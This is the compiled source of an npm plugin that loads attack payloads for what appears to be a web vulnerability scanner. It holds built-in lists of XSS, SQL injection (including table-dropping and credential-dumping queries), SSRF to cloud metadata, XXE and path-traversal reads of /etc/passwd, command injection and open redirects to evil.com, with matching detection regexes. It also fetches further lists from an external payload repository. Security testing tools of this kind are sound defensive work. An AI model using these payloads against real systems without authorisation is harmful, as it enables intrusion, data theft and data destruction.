@vulcn/plugin-payloads 0.1.0

package/dist/index.cjs

@@ -0,0 +1,611 @@
+"use strict";
+var __create = Object.create;
+var __defProp = Object.defineProperty;
+var __getOwnPropDesc = Object.getOwnPropertyDescriptor;
+var __getOwnPropNames = Object.getOwnPropertyNames;
+var __getProtoOf = Object.getPrototypeOf;
+var __hasOwnProp = Object.prototype.hasOwnProperty;
+var __export = (target, all) => {
+  for (var name in all)
+    __defProp(target, name, { get: all[name], enumerable: true });
+};
+var __copyProps = (to, from, except, desc) => {
+  if (from && typeof from === "object" || typeof from === "function") {
+    for (let key of __getOwnPropNames(from))
+      if (!__hasOwnProp.call(to, key) && key !== except)
+        __defProp(to, key, { get: () => from[key], enumerable: !(desc = __getOwnPropDesc(from, key)) || desc.enumerable });
+  }
+  return to;
+};
+var __toESM = (mod, isNodeMode, target) => (target = mod != null ? __create(__getProtoOf(mod)) : {}, __copyProps(
+  // If the importer is in node compatibility mode or this is not an ESM
+  // file that has been converted to a CommonJS file using a Babel-
+  // compatible transform (i.e. "__esModule" has not been set), then set
+  // "default" to the CommonJS "module.exports" for node compatibility.
+  isNodeMode || !mod || !mod.__esModule ? __defProp(target, "default", { value: mod, enumerable: true }) : target,
+  mod
+));
+var __toCommonJS = (mod) => __copyProps(__defProp({}, "__esModule", { value: true }), mod);
+
+// src/index.ts
+var index_exports = {};
+__export(index_exports, {
+  BUILTIN_PAYLOADS: () => BUILTIN_PAYLOADS,
+  default: () => index_default,
+  getPayloadBoxTypes: () => getPayloadBoxTypes,
+  loadFromFile: () => loadFromFile,
+  loadFromFiles: () => loadFromFiles,
+  loadPayloadBox: () => loadPayloadBox
+});
+module.exports = __toCommonJS(index_exports);
+var import_zod2 = require("zod");
+
+// src/builtin.ts
+var BUILTIN_PAYLOADS = {
+  // XSS Payloads
+  "xss-basic": {
+    name: "xss-basic",
+    category: "xss",
+    description: "Basic XSS payloads with script tags and event handlers",
+    source: "builtin",
+    payloads: [
+      '<script>alert("XSS")</script>',
+      '<img src=x onerror=alert("XSS")>',
+      '"><script>alert("XSS")</script>',
+      "javascript:alert('XSS')",
+      '<svg onload=alert("XSS")>'
+    ],
+    detectPatterns: [
+      /<script[^>]*>alert\(/i,
+      /onerror\s*=\s*alert\(/i,
+      /onload\s*=\s*alert\(/i,
+      /javascript:alert\(/i
+    ]
+  },
+  "xss-event": {
+    name: "xss-event",
+    category: "xss",
+    description: "XSS via event handlers",
+    source: "builtin",
+    payloads: [
+      '" onfocus="alert(1)" autofocus="',
+      "' onmouseover='alert(1)'",
+      '<body onload=alert("XSS")>',
+      "<input onfocus=alert(1) autofocus>",
+      "<marquee onstart=alert(1)>",
+      "<video src=x onerror=alert(1)>",
+      "<audio src=x onerror=alert(1)>"
+    ],
+    detectPatterns: [
+      /onfocus\s*=\s*["']?alert/i,
+      /onmouseover\s*=\s*["']?alert/i,
+      /onload\s*=\s*["']?alert/i,
+      /onstart\s*=\s*["']?alert/i,
+      /onerror\s*=\s*["']?alert/i
+    ]
+  },
+  "xss-svg": {
+    name: "xss-svg",
+    category: "xss",
+    description: "XSS via SVG elements",
+    source: "builtin",
+    payloads: [
+      '<svg/onload=alert("XSS")>',
+      "<svg><script>alert(1)</script></svg>",
+      "<svg><animate onbegin=alert(1)>",
+      "<svg><set onbegin=alert(1)>",
+      '<svg><foreignObject><iframe srcdoc="<script>alert(1)</script>">'
+    ],
+    detectPatterns: [
+      /<svg[^>]*onload\s*=/i,
+      /<svg[^>]*>.*<script>/i,
+      /onbegin\s*=\s*alert/i
+    ]
+  },
+  "xss-polyglot": {
+    name: "xss-polyglot",
+    category: "xss",
+    description: "XSS polyglot payloads that work in multiple contexts",
+    source: "builtin",
+    payloads: [
+      "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcLiCk=alert() )//",
+      `'"-->]]>*/</script><script>alert(1)</script>`,
+      "<img src=x:x onerror=alert(1)//",
+      "'-alert(1)-'",
+      '"><img src=x onerror=alert(1)>'
+    ],
+    detectPatterns: [/alert\s*\(\s*\d*\s*\)/i, /<script>/i, /onerror\s*=/i]
+  },
+  // SQL Injection Payloads
+  "sqli-basic": {
+    name: "sqli-basic",
+    category: "sqli",
+    description: "Basic SQL injection payloads",
+    source: "builtin",
+    payloads: [
+      "' OR '1'='1",
+      "' OR '1'='1' --",
+      "1' OR '1'='1",
+      "admin'--",
+      "' UNION SELECT NULL--",
+      "1; DROP TABLE users--"
+    ],
+    detectPatterns: [
+      /sql.*syntax/i,
+      /mysql.*error/i,
+      /ORA-\d{5}/i,
+      /pg_query/i,
+      /sqlite.*error/i,
+      /unclosed.*quotation/i
+    ]
+  },
+  "sqli-error": {
+    name: "sqli-error",
+    category: "sqli",
+    description: "SQL injection payloads to trigger errors",
+    source: "builtin",
+    payloads: [
+      "'",
+      "''",
+      "`",
+      '"',
+      "')",
+      `'"`,
+      "1' AND '1'='2",
+      "1 AND 1=2",
+      "1'1",
+      "1 exec sp_"
+    ],
+    detectPatterns: [
+      /sql.*syntax/i,
+      /mysql.*error/i,
+      /ORA-\d{5}/i,
+      /postgresql.*error/i,
+      /sqlite.*error/i,
+      /quoted.*string.*properly.*terminated/i,
+      /ODBC.*Driver/i,
+      /Microsoft.*ODBC/i
+    ]
+  },
+  "sqli-blind": {
+    name: "sqli-blind",
+    category: "sqli",
+    description: "Blind SQL injection payloads (timing-based)",
+    source: "builtin",
+    payloads: [
+      "1' AND SLEEP(5)--",
+      "1; WAITFOR DELAY '0:0:5'--",
+      "1' AND (SELECT COUNT(*) FROM information_schema.tables)>0--",
+      "1' AND (SELECT SUBSTRING(@@version,1,1))='5'--",
+      "1 AND SLEEP(5)"
+    ],
+    detectPatterns: [
+      // Blind SQLi is detected by timing, not content patterns
+    ]
+  },
+  "sqli-union": {
+    name: "sqli-union",
+    category: "sqli",
+    description: "UNION-based SQL injection payloads",
+    source: "builtin",
+    payloads: [
+      "' UNION SELECT NULL--",
+      "' UNION SELECT NULL,NULL--",
+      "' UNION SELECT NULL,NULL,NULL--",
+      "' UNION SELECT 1,2,3--",
+      "' UNION SELECT username,password FROM users--",
+      "1 UNION SELECT ALL FROM information_schema.tables--"
+    ],
+    detectPatterns: [
+      /sql.*syntax/i,
+      /column.*count/i,
+      /different.*number.*columns/i
+    ]
+  },
+  // SSRF Payloads
+  "ssrf-basic": {
+    name: "ssrf-basic",
+    category: "ssrf",
+    description: "Server-Side Request Forgery payloads",
+    source: "builtin",
+    payloads: [
+      "http://localhost",
+      "http://127.0.0.1",
+      "http://[::1]",
+      "http://169.254.169.254/latest/meta-data/",
+      "http://metadata.google.internal/",
+      "http://0.0.0.0",
+      "file:///etc/passwd",
+      "dict://localhost:11211/",
+      "gopher://localhost:25/_HELO"
+    ],
+    detectPatterns: [
+      /root:.*:0:0/i,
+      // /etc/passwd content
+      /ami-id/i,
+      // AWS metadata
+      /instance-id/i,
+      /\{"Code"\s*:/i
+      // Cloud metadata JSON
+    ]
+  },
+  // XXE Payloads
+  "xxe-basic": {
+    name: "xxe-basic",
+    category: "xxe",
+    description: "XML External Entity injection payloads",
+    source: "builtin",
+    payloads: [
+      '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>',
+      '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://localhost">]><foo>&xxe;</foo>',
+      '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]><foo>&xxe;</foo>',
+      '<?xml version="1.0"?><!DOCTYPE data [<!ENTITY file SYSTEM "php://filter/convert.base64-encode/resource=index.php">]><data>&file;</data>'
+    ],
+    detectPatterns: [
+      /root:.*:0:0/i,
+      /\[fonts\]/i,
+      // win.ini content
+      /\[extensions\]/i
+    ]
+  },
+  // Command Injection Payloads
+  "cmd-basic": {
+    name: "cmd-basic",
+    category: "command-injection",
+    description: "OS command injection payloads",
+    source: "builtin",
+    payloads: [
+      "; id",
+      "| id",
+      "& id",
+      "&& id",
+      "|| id",
+      "`id`",
+      "$(id)",
+      "; cat /etc/passwd",
+      "| cat /etc/passwd",
+      "& whoami",
+      "| whoami",
+      "; dir",
+      "| dir"
+    ],
+    detectPatterns: [
+      /uid=\d+\([\w]+\)/i,
+      // Unix id command output
+      /root:.*:0:0/i,
+      /Volume Serial Number/i,
+      // Windows dir output
+      /Directory of/i
+    ]
+  },
+  // Path Traversal Payloads
+  "path-traversal": {
+    name: "path-traversal",
+    category: "path-traversal",
+    description: "Directory traversal payloads",
+    source: "builtin",
+    payloads: [
+      "../../../etc/passwd",
+      "..\\..\\..\\windows\\win.ini",
+      "....//....//....//etc/passwd",
+      "..%2f..%2f..%2fetc/passwd",
+      "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd",
+      "..%252f..%252f..%252fetc/passwd",
+      "/etc/passwd",
+      "C:\\Windows\\win.ini"
+    ],
+    detectPatterns: [/root:.*:0:0/i, /\[fonts\]/i, /\[extensions\]/i]
+  },
+  // Open Redirect Payloads
+  "open-redirect": {
+    name: "open-redirect",
+    category: "open-redirect",
+    description: "Open redirect payloads for phishing",
+    source: "builtin",
+    payloads: [
+      "//evil.com",
+      "https://evil.com",
+      "/\\evil.com",
+      "//evil.com/%2f..",
+      "////evil.com",
+      "https:evil.com",
+      "//evil%E3%80%82com",
+      "javascript:alert(document.domain)"
+    ],
+    detectPatterns: [
+      // Open redirects are detected by observing the redirect behavior
+    ]
+  }
+};
+
+// src/loaders/payloadbox.ts
+var PAYLOADBOX_URLS = {
+  xss: "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/XSS%20Injection/Intruders/IntrudersXSS.txt",
+  "sql-injection": "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/SQL%20Injection/Intruder/Auth_Bypass.txt",
+  xxe: "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/XXE%20Injection/Intruders/xxe_payloads.txt",
+  "command-injection": "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/Command%20Injection/Intruder/command_exec.txt",
+  "open-redirect": "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/Open%20Redirect/Intruder/Open-Redirect-payloads.txt",
+  "path-traversal": "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/Directory%20Traversal/Intruder/traversals-8-deep-exotic-encoding.txt"
+};
+var CATEGORY_MAP = {
+  xss: "xss",
+  "sql-injection": "sqli",
+  xxe: "xxe",
+  "command-injection": "command-injection",
+  "open-redirect": "open-redirect",
+  "path-traversal": "path-traversal"
+};
+var cache = /* @__PURE__ */ new Map();
+function getPayloadBoxTypes() {
+  return Object.keys(PAYLOADBOX_URLS);
+}
+function isPayloadBoxType(type) {
+  return type in PAYLOADBOX_URLS;
+}
+async function loadPayloadBox(type, limit = 50, fetchFn = globalThis.fetch) {
+  if (!isPayloadBoxType(type)) {
+    throw new Error(
+      `Unknown PayloadBox type: ${type}. Available: ${getPayloadBoxTypes().join(", ")}`
+    );
+  }
+  const cached = cache.get(type);
+  if (cached) {
+    return cached;
+  }
+  const url = PAYLOADBOX_URLS[type];
+  try {
+    const response = await fetchFn(url);
+    if (!response.ok) {
+      throw new Error(
+        `Failed to fetch: ${response.status} ${response.statusText}`
+      );
+    }
+    const text = await response.text();
+    const payloads = text.split("\n").map((line) => line.trim()).filter((line) => line && !line.startsWith("#")).slice(0, limit);
+    if (payloads.length === 0) {
+      throw new Error(`No payloads found in ${type}`);
+    }
+    const payload = {
+      name: `payloadbox:${type}`,
+      category: CATEGORY_MAP[type],
+      description: `PayloadsAllTheThings ${type} - ${payloads.length} payloads`,
+      payloads,
+      detectPatterns: getDefaultPatterns(type),
+      source: "payloadbox"
+    };
+    cache.set(type, payload);
+    return payload;
+  } catch (err) {
+    throw new Error(
+      `Failed to fetch PayloadBox ${type}: ${err instanceof Error ? err.message : String(err)}`
+    );
+  }
+}
+function getDefaultPatterns(type) {
+  switch (type) {
+    case "xss":
+      return [
+        /<script[^>]*>alert\(/i,
+        /onerror\s*=\s*alert\(/i,
+        /onload\s*=\s*alert\(/i,
+        /javascript:alert\(/i
+      ];
+    case "sql-injection":
+      return [
+        /sql.*syntax/i,
+        /mysql.*error/i,
+        /ORA-\d{5}/i,
+        /pg_query/i,
+        /sqlite.*error/i
+      ];
+    case "xxe":
+      return [/root:.*:0:0/i, /\[fonts\]/i];
+    case "command-injection":
+      return [/uid=\d+\([\w]+\)/i, /root:.*:0:0/i];
+    case "open-redirect":
+      return [];
+    // Detected by redirect behavior
+    case "path-traversal":
+      return [/root:.*:0:0/i, /\[fonts\]/i, /\[extensions\]/i];
+    default:
+      return [];
+  }
+}
+
+// src/loaders/file.ts
+var import_promises = require("fs/promises");
+var import_node_path = require("path");
+var import_yaml = __toESM(require("yaml"), 1);
+var import_zod = require("zod");
+var PAYLOAD_CATEGORIES = [
+  "xss",
+  "sqli",
+  "ssrf",
+  "xxe",
+  "command-injection",
+  "path-traversal",
+  "open-redirect",
+  "custom"
+];
+var CustomPayloadSchema = import_zod.z.object({
+  name: import_zod.z.string().min(1),
+  category: import_zod.z.enum(
+    PAYLOAD_CATEGORIES
+  ),
+  description: import_zod.z.string().optional(),
+  payloads: import_zod.z.array(import_zod.z.string()).min(1),
+  detectPatterns: import_zod.z.array(import_zod.z.string()).optional()
+});
+var PayloadFileSchema = import_zod.z.object({
+  version: import_zod.z.string().optional(),
+  payloads: import_zod.z.array(CustomPayloadSchema)
+});
+async function loadFromFiles(filePaths) {
+  const payloads = [];
+  for (const filePath of filePaths) {
+    const loaded = await loadFromFile(filePath);
+    payloads.push(...loaded);
+  }
+  return payloads;
+}
+async function loadFromFile(filePath) {
+  const resolved = (0, import_node_path.isAbsolute)(filePath) ? filePath : (0, import_node_path.resolve)(process.cwd(), filePath);
+  const content = await (0, import_promises.readFile)(resolved, "utf-8");
+  const ext = (0, import_node_path.extname)(resolved).toLowerCase();
+  let data;
+  if (ext === ".json") {
+    data = JSON.parse(content);
+  } else if (ext === ".yml" || ext === ".yaml") {
+    data = import_yaml.default.parse(content);
+  } else {
+    throw new Error(
+      `Unsupported file extension: ${ext}. Use .yml, .yaml, or .json`
+    );
+  }
+  return parsePayloadData(data);
+}
+function parsePayloadData(data) {
+  const dataObj = data;
+  let parsed;
+  if (Array.isArray(data)) {
+    parsed = { version: "1", payloads: data };
+  } else if (dataObj?.name && dataObj?.category) {
+    parsed = { version: "1", payloads: [CustomPayloadSchema.parse(data)] };
+  } else if (dataObj?.payloads && Array.isArray(dataObj.payloads)) {
+    parsed = PayloadFileSchema.parse(data);
+  } else {
+    throw new Error(
+      "Invalid payload file format. Expected: array of payloads, file schema, or single payload object"
+    );
+  }
+  return parsed.payloads.map(
+    (p) => ({
+      name: p.name,
+      category: p.category,
+      description: p.description || `Custom payload: ${p.name}`,
+      payloads: p.payloads,
+      detectPatterns: parseDetectPatterns(p.detectPatterns),
+      source: "custom"
+    })
+  );
+}
+function parseDetectPatterns(patterns) {
+  if (!patterns || patterns.length === 0) {
+    return [];
+  }
+  const regexps = [];
+  for (const pattern of patterns) {
+    try {
+      regexps.push(new RegExp(pattern, "i"));
+    } catch {
+      console.warn(`Invalid regex pattern: ${pattern}`);
+    }
+  }
+  return regexps;
+}
+
+// src/index.ts
+var configSchema = import_zod2.z.object({
+  /**
+   * Include built-in payloads (default: true)
+   */
+  builtin: import_zod2.z.boolean().default(true),
+  /**
+   * Specific built-in payload names to include (if not all)
+   */
+  include: import_zod2.z.array(import_zod2.z.string()).optional(),
+  /**
+   * Built-in payload names to exclude
+   */
+  exclude: import_zod2.z.array(import_zod2.z.string()).optional(),
+  /**
+   * PayloadBox types to fetch from PayloadsAllTheThings
+   * e.g., ["xss", "sql-injection", "xxe"]
+   */
+  payloadbox: import_zod2.z.array(import_zod2.z.string()).optional(),
+  /**
+   * Limit per PayloadBox type
+   */
+  payloadboxLimit: import_zod2.z.number().default(50),
+  /**
+   * Custom payload files to load (YAML/JSON)
+   */
+  files: import_zod2.z.array(import_zod2.z.string()).optional()
+});
+var plugin = {
+  name: "@vulcn/plugin-payloads",
+  version: "0.2.0",
+  apiVersion: 1,
+  description: "Official payload loader plugin - built-in, PayloadBox, and custom files",
+  configSchema,
+  hooks: {
+    onInit: async (ctx) => {
+      const config = configSchema.parse(ctx.config);
+      const loadedPayloads = [];
+      if (config.builtin) {
+        let builtinNames = Object.keys(BUILTIN_PAYLOADS);
+        if (config.include?.length) {
+          builtinNames = builtinNames.filter(
+            (name) => config.include.includes(name)
+          );
+        }
+        if (config.exclude?.length) {
+          builtinNames = builtinNames.filter(
+            (name) => !config.exclude.includes(name)
+          );
+        }
+        for (const name of builtinNames) {
+          const payload = BUILTIN_PAYLOADS[name];
+          if (payload) {
+            loadedPayloads.push(payload);
+          }
+        }
+        ctx.logger.debug(`Loaded ${builtinNames.length} built-in payload sets`);
+      }
+      if (config.payloadbox?.length) {
+        for (const type of config.payloadbox) {
+          try {
+            const payload = await loadPayloadBox(
+              type,
+              config.payloadboxLimit,
+              ctx.fetch
+            );
+            loadedPayloads.push(payload);
+            ctx.logger.debug(`Loaded PayloadBox: ${type}`);
+          } catch (err) {
+            ctx.logger.error(
+              `Failed to load PayloadBox ${type}: ${err instanceof Error ? err.message : String(err)}`
+            );
+          }
+        }
+      }
+      if (config.files?.length) {
+        try {
+          const filePayloads = await loadFromFiles(config.files);
+          loadedPayloads.push(...filePayloads);
+          ctx.logger.debug(
+            `Loaded ${filePayloads.length} payload sets from files`
+          );
+        } catch (err) {
+          ctx.logger.error(
+            `Failed to load custom files: ${err instanceof Error ? err.message : String(err)}`
+          );
+        }
+      }
+      ctx.payloads.push(...loadedPayloads);
+      ctx.logger.info(
+        `Payloads plugin loaded ${loadedPayloads.length} payload sets`
+      );
+    }
+  }
+};
+var index_default = plugin;
+// Annotate the CommonJS export names for ESM import in node:
+0 && (module.exports = {
+  BUILTIN_PAYLOADS,
+  getPayloadBoxTypes,
+  loadFromFile,
+  loadFromFiles,
+  loadPayloadBox
+});
+//# sourceMappingURL=index.cjs.map